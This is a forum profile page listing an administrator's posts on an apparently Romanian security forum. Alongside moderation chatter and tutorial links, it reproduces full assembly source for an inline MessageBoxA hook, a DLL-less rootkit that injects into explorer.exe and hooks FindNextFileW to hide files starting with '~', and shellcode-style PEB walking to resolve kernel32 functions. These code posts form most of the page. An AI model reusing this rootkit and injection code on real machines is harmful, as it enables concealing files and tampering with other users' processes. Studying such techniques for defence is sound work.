Nytro

Administrators
  • Posts: 18772
  • Days Won: 730

Everything posted by Nytro

  1. Yes, you're commenting nonsense; I would have banned him by now, and the link has been removed... I don't see where the problem is. It just gets moved to Gunoi (the trash section).
  2. This way the people who actually need a domain won't find one. Because 45% of you won't use any of the domains you picked, and 45% will use only one. But who cares that you don't need them, grab them just to have them. I only took nytro.free; let's hope I'll get it by 2012.
  3. Fun stuff

    This one comes before the one above: YouTube - Telecomanda Plural - NU STIU
  4. What's the use of modifying a text file?
  5. I think I had made a small blogging system in Selenity CMS, but I really don't recommend that junk as study material. Learn HTTP/HTML/PHP/MySQL/JavaScript/CSS and you'll understand on your own how it's done.
  6. Wouldn't it be better to make a useful program that does something nice?
  7. I don't have access, but if you give kwe that kiss he'll increase your space. PS: Don't let me catch you without a bottle of booze; the day after tomorrow it'll be 3 days since I last drank :-> Oh, I don't go to school very often, but there are also days when I sit through almost all the lectures. Give me a sign. Is anyone else at the University of Bucharest, Computer Science?
  8. I had a small problem with private messaging; I think the problem is due to vBulletin and the browsers, but it's been resolved. If someone sent me a message of some importance recently, please send it again. I won't go into the causes of the problem; it can show up on other accounts too, but I believe the only affected account was mine, because of some "tests".
  9. Basic: http://visualbasic.freetutes.com/learn-vb6/ Advanced: http://visualbasic.freetutes.com/learn-vb6-advanced/
  10. The keylogger probably used a keyboard hook and not the ancient GetAsyncKeyState.
  11. These days you can't write a two-line program, because those same lines are used by all sorts of pseudo-viruses that get detected by all the pseudo-antiviruses. If anyone thinks this little program is infected or does who knows what nonsense (though I don't see what it could do), they're free to analyze the program, disassemble it, whatever.
  12. Nicolae Guta - Leii grei
  13. Arhitectura calculatorului (or: Arhitectura sistemelor de calcul) - Adrian Atanasiu, Ed. Infodata
    Programarea procesoarelor Intel (I think that's the title) - Vasile Lungu, Ed. Teora
  14. Books are the best way to learn, but there are good tutorials too. I'm doing ASM at university (in the Arhitectura Sistemelor de Calcul course - University of Bucharest, Computer Science).
  15. Credits: Alan
    Website: Ellicit.org

    .486
    .MODEL FLAT, STDCALL
    OPTION CASEMAP:NONE

    INCLUDE C:\masm32\include\windows.inc
    INCLUDE C:\masm32\include\kernel32.inc
    INCLUDE C:\masm32\include\user32.inc
    INCLUDELIB C:\masm32\lib\kernel32.lib
    INCLUDELIB C:\masm32\lib\user32.lib

    .DATA
    LibName DB 'user32.dll', 0
    APIName DB 'MessageBoxA', 0

    .DATA?
    OgMessageBoxA DD ?

    .CODE
    HookAPI PROC Origin:DWORD, Destination:DWORD, CodeLength:DWORD
        LOCAL Protection:DWORD
        PUSH ESI
        PUSH EDI
        INVOKE VirtualProtect, Origin, CodeLength, PAGE_READWRITE, ADDR Protection
        MOV EAX, CodeLength
        ADD EAX, 5h
        INVOKE VirtualAlloc, NULL, EAX, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE
        PUSH EAX
        MOV EDI, EAX
        MOV ESI, Origin
        MOV ECX, CodeLength
        REP MOVSB
        MOV BYTE PTR [EDI], 0E9h
        MOV ECX, Origin
        SUB ECX, EAX
        SUB ECX, 5h
        MOV [EDI + 1h], ECX
        MOV EDI, Origin
        MOV BYTE PTR [EDI], 0E9h
        MOV ECX, Destination
        SUB ECX, Origin
        SUB ECX, 5h
        MOV [EDI + 1h], ECX
        INVOKE VirtualProtect, Origin, CodeLength, Protection, ADDR Protection
        POP EAX
        POP EDI
        POP ESI
        RET
    HookAPI ENDP

    HkMessageBoxA PROC hWnd:DWORD, lpText:DWORD, lpCaption:DWORD, uType:DWORD
        .IF uType == NULL          ; If the user application provides NULL/MB_OK we will give them a nice icon too
            PUSH MB_ICONEXCLAMATION
        .ELSE
            PUSH uType
        .ENDIF
        PUSH lpCaption
        PUSH lpText
        PUSH hWnd
        CALL OgMessageBoxA
        ; EAX holds the result; we could change it here if we wished before returning to the user application
        RET
    HkMessageBoxA ENDP

    ENTRY:
        INVOKE MessageBoxA, NULL, OFFSET APIName, OFFSET LibName, NULL   ; Non-hooked MessageBoxA works as the programmer made it
        INVOKE LoadLibraryA, OFFSET LibName
        INVOKE GetProcAddress, EAX, OFFSET APIName
        INVOKE HookAPI, EAX, OFFSET HkMessageBoxA, 0Bh
        MOV OgMessageBoxA, EAX                                            ; Remember to save the offset for the hooked function to call the original
        INVOKE MessageBoxA, NULL, OFFSET APIName, OFFSET LibName, NULL   ; Hooked MessageBoxA with our evil icon-adding patch
        INVOKE ExitProcess, NULL
    END ENTRY

    COMMENT ^
    Win2000SP4.USER32!MessageBoxA
    77E38098 > 55                PUSH EBP
    77E38099   8BEC              MOV EBP,ESP
    77E3809B   51                PUSH ECX
    77E3809C   833D 3892E677 00  CMP DWORD PTR DS:[77E69238],0
    ^
  16. Author: EON - Hi, this code hooks the FindNextFileW API to hide all the files that begin with "~". Change the pid to the pid of explorer.exe to see the effect.

    ; *******************************************************
    ; *** Example of a little rootkit that hides all the  ***
    ; *** files that begin with "~" without using a DLL.  ***
    ; ***                                                 ***
    ; *** By E0N (L) 2008                                 ***
    ; *******************************************************

    include 'H:\archivos de programa\fasm\include\win32ax.inc'

    .data
    HookApi        db 'FindNextFileW', 0   ; Name of the API to hook
    HookDll        db 'Kernel32.dll', 0    ; Name of the DLL that contains it
    DirApi         dd ?                    ; Address of the API to hook
    process        dd ?
    pid            dd 2160                 ; PID of the process to hook
    x              dd 7                    ; Number of bytes the API has at its beginning
    BufferCall     dd ?                    ; Buffer to call the API (in our process)
    inyBufferCall  dd ?                    ; Pointer to the buffer to call the API once injected
    tamFun         dd ?                    ; Size of the function that will replace the API
    inyFun         dd ?                    ; Pointer to this buffer once injected
    BufferApi      dd ?                    ; 5-byte buffer to replace the beginning of the API

    struct Datos
        sBufferCall dd ?                   ; Pointer to inyBufferCall so the original API can be called
    ends

    dat            Datos ?
    SizeofDatos    dd 4
    dirStruct      dd ?                    ; Pointer to the structure once injected
    Prote          dd ?                    ; For VirtualProtect

    .code
    start:
        ; Get a handle to the process we will inject into
        mov eax, PROCESS_VM_OPERATION
        or eax, PROCESS_VM_WRITE
        invoke OpenProcess, eax, FALSE, [pid]
        mov [process], eax

        ; Get the address of the API to hook
        invoke GetModuleHandle, HookDll
        invoke GetProcAddress, eax, HookApi
        mov [DirApi], eax

        ; Build the buffer to call the API:
        ; x bytes              | 1 byte      | 4 bytes    | 1 byte
        ; first x bytes of API | push [0x68] | DirApi + x | ret [0xC3]
        mov eax, dword [x]
        add eax, 6
        invoke LocalAlloc, LPTR, eax                          ; eax = x + 6
        mov [BufferCall], eax
        invoke RtlMoveMemory, [BufferCall], [DirApi], [x]     ; Copy the first x bytes of the API
        mov eax, [BufferCall]
        add eax, [x]
        mov byte [eax], 0x68
        inc eax
        mov ebx, [DirApi]
        add ebx, [x]
        mov dword [eax], ebx
        add eax, 4
        mov byte [eax], 0xC3

        ; Inject this buffer
        mov eax, MEM_RESERVE                                  ; eax = MEM_RESERVE | MEM_COMMIT
        or eax, MEM_COMMIT
        mov ecx, [x]                                          ; ecx = x + 6
        add ecx, 6
        invoke VirtualAllocEx, [process], 0, ecx, eax, PAGE_READWRITE
        mov [inyBufferCall], eax
        mov ebx, [x]                                          ; ebx = x + 6
        add ebx, 6
        invoke WriteProcessMemory, [process], [inyBufferCall], [BufferCall], ebx, NULL

        ; Initialize the structure
        mov eax, [inyBufferCall]                              ; Store the pointer to the buffer so the API
        mov [dat.sBufferCall], eax                            ; can be called normally

        ; Inject the structure
        mov eax, MEM_RESERVE
        or eax, MEM_COMMIT
        invoke VirtualAllocEx, [process], 0, [SizeofDatos], eax, PAGE_READWRITE
        mov [dirStruct], eax
        invoke WriteProcessMemory, [process], [dirStruct], dat, [SizeofDatos], NULL

        ; Replace the 0x0000 with a pointer to the structure
        mov ebx, CAMBIO                                       ; ebx = the 0x0000 that must be changed (4 bytes)
        sub ebx, 4
        invoke VirtualProtect, ebx, 6, PAGE_EXECUTE_READWRITE, Prote
        invoke RtlMoveMemory, ebx, dirStruct, 4

        ; Calculate the size of the function to inject
        mov eax, FIN_MyFindNextFileW
        sub eax, MyFindNextFileW
        mov [tamFun], eax

        ; Inject the function
        mov eax, MEM_RESERVE                                  ; eax = MEM_RESERVE | MEM_COMMIT
        or eax, MEM_COMMIT
        invoke VirtualAllocEx, [process], 0, [tamFun], eax, PAGE_EXECUTE_READWRITE
        mov [inyFun], eax
        invoke WriteProcessMemory, [process], [inyFun], MyFindNextFileW, [tamFun], NULL

        ; Build a buffer to hook the API
        ; 1 byte     | 4 bytes
        ; jmp [0xE9] | size of the jump
        invoke LocalAlloc, LPTR, 5
        mov [BufferApi], eax
        mov byte [eax], 0xE9
        inc eax
        mov ebx, [inyFun]
        sub ebx, [DirApi]
        sub ebx, 5                                            ; 5 = 1 for the 0xE9 plus 4 for the address
        mov dword [eax], ebx

        ; Inject this buffer at the beginning of the API
        mov eax, MEM_RESERVE                                  ; eax = MEM_RESERVE | MEM_COMMIT
        or eax, MEM_COMMIT
        invoke VirtualAllocEx, [process], [DirApi], 5, eax, PAGE_EXECUTE_READWRITE
        invoke WriteProcessMemory, [process], [DirApi], [BufferApi], 5, NULL

        invoke ExitProcess, 0

    ; Function that will replace the API
    proc MyFindNextFileW hFindFile, lpFindFileData
    OK:
        mov ebx, 0x0000                                       ; This 0x0000 will become a pointer to the buffer before injection
    CAMBIO:
        push [lpFindFileData]
        push [hFindFile]
        call dword [ebx]
        mov ebx, eax
        cmp ebx, 0
        je RETORNAR_FIN
        mov eax, [lpFindFileData]
        ; add eax, 44
        cmp byte [eax], '~'
        je OK
        mov eax, 1
        ret
    RETORNAR_FIN:
        mov eax, 0
        ret
    endp
    FIN_MyFindNextFileW:

    .end start

    In conclusion, it is a little rootkit without a DLL.
  17. Credits: HUTCH for the StringCompare function, PHRACK for the tip on retrieving K32. Reference: NEITSA for the methodology. Author: steve10120

        call .hwndDelta
    .hwndDelta:
        pop ebp
        sub ebp, .hwndDelta

    .find_kernel:
        mov eax, [fs:30h]                    ; EAX = PEB base
        mov eax, [eax + 0ch]                 ; EAX = PEB_LDR_DATA
        mov esi, [eax + 1ch]                 ; first entry in InInitializationOrderModuleList
        lodsd                                ; forward to next LIST_ENTRY
        mov ebx, [eax + 08h]                 ; EBX = Kernel32 base address
        mov [ebp + _kernelBase], ebx
        mov esi, dword[ebx + 3Ch]            ; ESI = PE MAGIC
        add esi, [ebp + _kernelBase]
        mov edx, [esi + 078h]                ; EDX = RVA of the export table
        add edx, [ebp + _kernelBase]         ; EDX = VA of the export table
        mov ecx, [edx + 018h]                ; ECX = number of exports in the DLL
        mov [ebp + _function_nb], ecx
        mov ebx, [edx + 020h]                ; EBX = RVA of the name pointer table
        add ebx, 4
        add ebx, [ebp + _kernelBase]         ; EBX = VA of the name pointer table
        ; From here on we have everything needed to look up the functions

        ; Retrieve GetProcAddress
        pushad
        lea edi, [ebp + _szGetProcAddress]   ; EDI = GetProcAddress string
        call .find_function
        mov [ebp + _getProcAddress], eax
        popad
        ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

        ; Retrieve LoadLibrary
        pushad
        lea edi, [ebp + _szLoadLibrary]      ; EDI = LoadLibraryA string
        call .find_function
        mov [ebp + _loadLibrary], eax
        popad
        ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

        ; TEST MESSAGEBOX
        ;
        lea ebx, [ebp + _szUser32]
        push ebx
        call [ebp + _loadLibrary]
        ;
        lea ebx, [ebp + _szMessageBox]
        push ebx
        push eax
        lea edx, [ebp + _getProcAddress]
        call dword[edx]
        ;
        push 0
        lea esi, [ebp + _szGetProcAddress]
        push esi
        lea edi, [ebp + _szGetProcAddress]
        push edi
        push 0
        call eax
        ;;;;;;;;;;;;;;;;
        ret

    .find_function:
    .find_function_loop:
        mov esi, dword[ebx]                  ; ESI = RVA of the function name string
        add ebx, 4
        add esi, [ebp + _kernelBase]         ; ESI = VA of the function name string
        dec ecx                              ; ECX = ECX - 1
        call .stringCompare
        cmp eax, -1
        je .find_function_loop
        mov ebx, [edx + 01ch]                ; EBX = export address table RVA
        add ebx, [ebp + _kernelBase]         ; pointer to the export address table
        mov edx, dword[_function_nb]
        sub edx, ecx
        imul edx, edx, 4
        add ebx, edx
        mov eax, ebx
        mov eax, dword[eax]
        add eax, [ebp + _kernelBase]
        ret

    .stringCompare:
        pushad
        mov ecx, esi
        mov edx, edi
    .cmst:
        mov al, [ecx]
        cmp al, [edx]
        jne .no_match
        add ecx, 1
        add edx, 1
        test al, al
        jne .cmst
        popad
        xor eax, eax
        ret
    .no_match:
        popad
        mov eax, -1
        ret

    _szGetProcAddress db "GetProcAddress", 0
    _szLoadLibrary    db "LoadLibraryA", 0
    _kernelBase       dd ?
    _function_nb      dd ?
    _szMessageBox     db "MessageBoxA", 0
    _szUser32         db "user32.dll", 0
    _getProcAddress   dd ?
    _loadLibrary      dd ?
  18. Aren't you buying a round? :->
  19. Yes, porn users.
  20. Yes, typical. Windu: You'll see many comments like these; my suggestion is to ignore them.
  21. What a jerk =)))

    Did you actually download what he posted? After he told you what it contains?
  22. Where was it? Could anyone participate?
  23. Crap topic. It resulted in 8 warnings, which led to a few bans. Moved to Gunoi (the trash section).
  24. Binary Code Modification [Patching Vulnerabilities] Download: http://www.securityarchitect.org/binary-english.pdf
  25. Cute; none of the posts have anything to do with that program, so they all got a warning. And 3 bans resulted. In case you hadn't noticed, I'm back.